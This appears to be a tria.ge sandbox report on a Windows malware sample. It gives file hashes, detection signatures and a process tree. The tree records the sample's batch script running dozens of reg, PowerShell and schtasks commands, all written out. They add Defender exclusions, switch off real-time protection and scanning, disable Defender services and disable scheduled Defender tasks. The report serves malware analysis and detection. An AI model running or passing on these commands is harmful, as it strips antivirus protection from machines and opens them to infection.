Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
19/03/2024, 02:48
Static task
static1
Behavioral task
behavioral1
Sample
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
Resource
win7-20240221-en
General
-
Target
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
-
Size
91KB
-
MD5
607acc5a6b670bd144bf3897cda6b233
-
SHA1
24a2fc93216adb3543ee555473b2f61f333384d2
-
SHA256
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8
-
SHA512
75bd3c2fe2a6b96586e0e1ecf5d282d55f71fb9891961ca1dd6c6be90eaa9a196fd62c8343abfdb039e384895a593f2a01c725451c580980f238c40d764b4643
-
SSDEEP
1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfLx4fmSxL2MO2:nq6+ouCpk2mpcWJ0r+QNTBfLyfmSBR
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x0007000000016412-1.dat disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2160 powershell.exe 2508 powershell.exe 2344 powershell.exe 2932 powershell.exe 748 powershell.exe 2184 powershell.exe 1288 powershell.exe 2500 powershell.exe 2992 powershell.exe 1708 powershell.exe 1780 powershell.exe 1988 powershell.exe 1964 powershell.exe 588 powershell.exe 1716 powershell.exe 832 powershell.exe 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2368 2188 c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe 28 PID 2188 wrote to memory of 2368 2188 c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe 28 PID 2188 wrote to memory of 2368 2188 c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe 28 PID 2188 wrote to memory of 2368 2188 c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe 28 PID 2368 wrote to memory of 2160 2368 cmd.exe 30 PID 2368 wrote to memory of 2160 2368 cmd.exe 30 PID 2368 wrote to memory of 2160 2368 cmd.exe 30 PID 2368 wrote to memory of 2508 2368 cmd.exe 31 PID 2368 wrote to memory of 2508 2368 cmd.exe 31 PID 2368 wrote to memory of 2508 2368 cmd.exe 31 PID 2368 wrote to memory of 2344 2368 cmd.exe 32 PID 2368 wrote to memory of 2344 2368 cmd.exe 32 PID 2368 wrote to memory of 2344 2368 cmd.exe 32 PID 2368 wrote to memory of 2932 2368 cmd.exe 33 PID 2368 wrote to memory of 2932 2368 cmd.exe 33 PID 2368 wrote to memory of 2932 2368 cmd.exe 33 PID 2368 wrote to memory of 748 2368 cmd.exe 34 PID 2368 wrote to memory of 748 2368 cmd.exe 34 PID 2368 wrote to memory of 748 2368 cmd.exe 34 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2768 2368 cmd.exe 36 PID 2368 wrote to memory of 2768 2368 cmd.exe 36 PID 2368 wrote to memory of 2768 2368 cmd.exe 36 PID 2368 wrote to memory of 2772 2368 cmd.exe 37 PID 2368 wrote to memory of 2772 2368 cmd.exe 37 PID 2368 wrote to memory of 2772 2368 cmd.exe 37 PID 2368 wrote to memory of 2712 2368 cmd.exe 38 PID 2368 wrote to memory of 2712 2368 cmd.exe 38 PID 2368 wrote to memory of 2712 2368 cmd.exe 38 PID 2368 wrote to memory of 2760 2368 cmd.exe 39 PID 2368 wrote to memory of 2760 2368 cmd.exe 39 PID 2368 wrote to memory of 2760 2368 cmd.exe 39 PID 2368 wrote to memory of 1632 2368 cmd.exe 40 PID 2368 wrote to memory of 1632 2368 cmd.exe 40 PID 2368 wrote to memory of 1632 2368 cmd.exe 40 PID 2368 wrote to memory of 2176 2368 cmd.exe 41 PID 2368 wrote to memory of 2176 2368 cmd.exe 41 PID 2368 wrote to memory of 2176 2368 cmd.exe 41 PID 2368 wrote to memory of 1544 2368 cmd.exe 42 PID 2368 wrote to memory of 1544 2368 cmd.exe 42 PID 2368 wrote to memory of 1544 2368 cmd.exe 42 PID 2368 wrote to memory of 2784 2368 cmd.exe 43 PID 2368 wrote to memory of 2784 2368 cmd.exe 43 PID 2368 wrote to memory of 2784 2368 cmd.exe 43 PID 2368 wrote to memory of 2376 2368 cmd.exe 44 PID 2368 wrote to memory of 2376 2368 cmd.exe 44 PID 2368 wrote to memory of 2376 2368 cmd.exe 44 PID 2368 wrote to memory of 620 2368 cmd.exe 45 PID 2368 wrote to memory of 620 2368 cmd.exe 45 PID 2368 wrote to memory of 620 2368 cmd.exe 45 PID 2368 wrote to memory of 1756 2368 cmd.exe 46 PID 2368 wrote to memory of 1756 2368 cmd.exe 46 PID 2368 wrote to memory of 1756 2368 cmd.exe 46 PID 2368 wrote to memory of 1808 2368 cmd.exe 47 PID 2368 wrote to memory of 1808 2368 cmd.exe 47 PID 2368 wrote to memory of 1808 2368 cmd.exe 47 PID 2368 wrote to memory of 1096 2368 cmd.exe 48 PID 2368 wrote to memory of 1096 2368 cmd.exe 48 PID 2368 wrote to memory of 1096 2368 cmd.exe 48 PID 2368 wrote to memory of 784 2368 cmd.exe 49 PID 2368 wrote to memory of 784 2368 cmd.exe 49 PID 2368 wrote to memory of 784 2368 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6123.tmp\6124.tmp\6125.bat C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2768
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵PID:2772
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:2712
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2760
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1632
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2176
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1544
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2784
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:2376
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:620
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1756
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1808
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1096
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:784
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:980
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1536
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1952
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:1240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:2444
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:2480
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2568
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:2632
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2476
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ad8b6610172ff7b78c52f9ca37f38087
SHA19e672aa0385998b41de0eaee280af9372f3b299c
SHA256582e18cb3c8b2c06080cbb7df73ef27128654a4f201476f457a787cae6b068a4
SHA5122dd57fab8f54736dfe975b7c5c83de1c864e1f3fe498045f566f58da059be311ca8194c6634df447fbcec9382e3b67c70cc9fbc6a29076accdbcc1c0de829658
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLMVB888Q2W0O8MROR2K.temp
Filesize7KB
MD5278bc18e56ca596317b928641e7e0de0
SHA1f07147617d84fb443803b330b265ca40c802f200
SHA256494379f6ed5880bbd7f4e3dc0191c1812ce219cdec0442e28c803de0ecee2204
SHA51267d9e44ad7f039e22c75c6e4f382885be609625b6005f454dc4fa136e0ca270e38a7b9c803c9b80943595d1d76f63d8a1360e9f540a5a909382f8a98b1e4f09a